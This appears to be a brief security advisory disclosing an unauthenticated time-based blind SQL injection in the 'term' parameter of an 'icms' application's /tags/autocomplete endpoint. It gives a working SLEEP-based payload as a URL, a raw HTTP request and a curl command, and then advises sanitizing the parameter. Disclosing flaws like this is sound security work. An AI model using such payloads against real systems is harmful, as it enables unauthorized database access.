The application was found to be vulnerable to an unauthenticated blind SQL injection in the /tags/autocomplete
page.
The GET parameter term
does not sufficiently sanitize input.
http://icms.local/tags/autocomplete?term=')+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))x)+AND+(1='
and observe that the server responds to the time delay.GET /tags/autocomplete?term=')+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))x)+AND+(1=' HTTP/1.1
Host: icms.local
X-Requested-With: XMLHttpRequest
curl -i -s -k -X $'GET' \
-H $'Host: icms.local' -H $'X-Requested-With: XMLHttpRequest' \
$'http://icms.local/tags/autocomplete?term=\')+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))x)+AND+(1=\''
X-Requested-With: XMLHttpRequest
is in the HTTP request headers, an unauthenticated attacker can make the request directly to inject into the affected parameter.It is recommended to sanitize the affected parameter term
.